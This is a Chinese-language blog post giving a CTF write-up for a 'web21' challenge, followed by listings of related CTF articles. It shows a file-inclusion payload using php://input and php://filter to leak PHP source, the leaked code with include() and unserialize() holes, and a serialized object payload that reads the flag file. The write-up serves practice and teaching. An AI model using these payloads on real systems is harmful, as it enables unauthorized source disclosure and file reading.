刷题之旅第3站,论剑场web21

最新推荐文章于 2021-01-14 17:28:07 发布
最新推荐文章于 2021-01-14 17:28:07 发布
阅读量224 收藏
点赞数
分类专栏: 刷题之旅100站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45940434/article/details/104031504
版权

web21
在这里插入图片描述

F12看一下
在这里插入图片描述

看了一下,应该是代码审计的题,使用php伪协议,进行post 以及文件包含漏洞。

http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=index.php
在这里插入图片描述
爆出了index.php源码

在这里插入代码片<?php
error_reporting(E_ALL & ~E_NOTICE);
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
 
?>
 
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 -->

http://123.206.31.85:10021/?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php
同理,再去爆一下class.php的源码

<?php
error_reporting(E_ALL & ~E_NOTICE);
 
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}
?>

于是我们构造一下序列化read
在这里插入图片描述
提交即可得到flag

$pass=O:4:“Read”:1:{s:4:“file”;s:8:“f1a9.php”;}

在这里插入图片描述

圆圈勾勒成指纹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sword-to-offer:剑指offer刷题之旅
05-15
Sword to offer 剑指offer刷题之旅
leetcode:记录刷题之旅
03-15
记录刷题之旅 # 标题 解决方案 主意 105 哈希表;前序第一位为根,递归 172 零由5得到,n / 5为有1个5的个数,再/ 5为有2个5的个数,以此类推 ZJ_3 距离(递归法时间不过,用动态规划) 85 1739 1 \ 3 \ 6 \ 10 \...
CTF-论剑 web21
qq_45826388的博客
08-26 248
web21 右键查看源代码 这里利用php://input 给$user传值,然后利用下面include()函数包含class.php php://filter/read=convert.base64-encode/resource=class.php 将class.php的源码转换为base64编码; 没读出来抓包看一下
CTF论剑web题目(持续更新)--WEB21
jiuyongpinyin的博客
07-22 408
web21 首先声明,这道题我自己没做出来,代码审计的题除非特别简单,要不对于我这萌新来说,都和看天书一样,这道题是参考大佬的 参考链接:https://blog.csdn.net/weixin_45940434/article/details/104031504 再次感谢大佬!!! 首先打开页面,查看网页源代码: 这里是一个PHP伪协议,使用文件包含,构造payload: POST传入参数**(但是我不知道为什么是POST传参,有知道的大佬麻烦给我留言,万分感谢!!)** base64解码得到inde
php初学(五) - ---------------- 注册登录
歌布衣的博客
08-04 298
之前php初学的几篇简单介绍了什么是php,php的环境搭建,php与mysql之间数据的操作。这里就简单写个用户的注册和登录的demo。
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9342
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
ctfhub——php://input
At0m的博客
01-14 6857
首先这道题 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个题应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
leetcode:开始LeetCode刷题之旅
04-27
密码开始LeetCode刷题之旅列表=====>开始于2015-09-06 <=====反向链表II 重新订购清单k组中的反向节点轮换清单排序清单成对交换节点=====>结束于2015-09-30 <====== 种类=====>从2015-10-08开始<===== 2个...
leetcode:leetcode的刷题之旅
07-01
leetcode leetcode的刷题之旅 我是按照官网给的Tag来刷的,难度从易到难 会考虑用C++/Java/Python来实现,找工作必备 如果有问题,欢迎提issue,也可以email:
LeetCodeJourney:LeetCode刷题之旅
03-06
我的LeetCode刷题之路 这个仓库用来存放我在LeetCode刷题的解法和思路。
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF_论剑 Web WriteUp(持续更新)
qq_41995976的博客
05-19 6302
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 题干: 要求你PUT一串信息"bugku" 才能获得flag...
Bugku新平台论剑writeup
a370793934的专栏
11-28 1万+
头像 用010editor打开搜索flag就是找到的flag:flag{bGxvdmV0aGVnaXJs}再经过base64解密flag{llovethegirl}后再来进行MD5加密得到 flag{8ba484e0a0e0a5ee4ffcb791385ddf25} 签到 签个到吧 flag{abcdABCD1234} 0和1的故事 解压后有flag{}.txt文件,用1...
http://123.206.31.85/ 上的几道Web题 23-26
WhiteLamp的博客
01-26 960
23、是一个SQL注入,尝试许久未果,我再学学SQL去。。。 24、抓包看了下 会在本地cookie保存一个id,并返回一串flag,base64解码后发现是: 但是这个并不是flag呀 重复后发现,这个flag每次都不一样,再结合速度要快? 难道又像老司机车速那个。 请出脚本(CTF学python系列): import requests,base64 import re
Writeup - CTF - Social - 练习平台(123.206.31.85)
weixin_34273479的博客
11-13 179
密码??? 社会工程学之东凑西凑 KEY{ZS19970315} 域名解析? 修改本地HOSTS文件,访问flag.bugku.com得到flag KEY{DSAHDSJ82HDS2211} 信息查找??? 百度bugku.cn KEY{462713425} 简单个人信息收集 ...
20190423 CTF题-web
烟敛寒林的博客
04-24 1147
签到题(代码审计-extract变量覆盖) WEB1(SQL注入) WEB2(万能语句登陆框) WEB3(文件包含+php伪协议) WEB4(脚本题) WEB5(md5验证) vim编辑器(备份文件+代码审计) WEB7(伪造ip) 签到题(代码审计-extract变量覆盖) 很明显是一道关于extract变量覆盖的代码审计题。 需要满足下面两个条件: 利用extract...
CTF_论剑 webweb2
silence1_的博客
05-31 1522
CTF_论剑 webweb2 题目: 进入题目,一看就是要写脚本的那种题2333 python脚本如下: import requests url="http://123.206.31.85:10002/" res=requests.get(url) cookies=res.cookies["PHPSESSID"] #获得session t...
new bugku web26 writeup(CTF_论剑)
nonono123456的博客
09-20 1400
new bugku web26 writeup(CTF_论剑) 根据代码可以看到,传入参数为num以及str。 当传入flag是可以读取flag.php。 直接构造?num=3&str=flag可以发现flag
http://123.206.31.85/ 上的几道Web题 27-30
WhiteLamp的博客
01-28 2329
27、查看源代码,发现提示: 那就去1p.html看看,但是发现回到了CTF社区的首页。 再抓个包看看发生了什么: 发现一段base64,解密后还是一段url编码,再解码后得到一段代码: 里面提到一个文件:f4l2a3g.txt,访问之,直接得到flag。 28、查看源码,发现一堆代码,意思就是有个user变量接收一个txt变量,这个txt变量是必须是一个文件??而且内容是w
杭电oj刷题第二阶段答案2081
最新发布
05-22
多组数据,每组数据第一行是一个整数n(1),表示有n个数需要放。接下来一行n个整数ai(1),表示需要放的数。 输出格式 每组数据输出一行,表示最多能放多少个数。 样例输入 3 2 3 5 5 2 3 4 7 12 样例输出 3 2 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值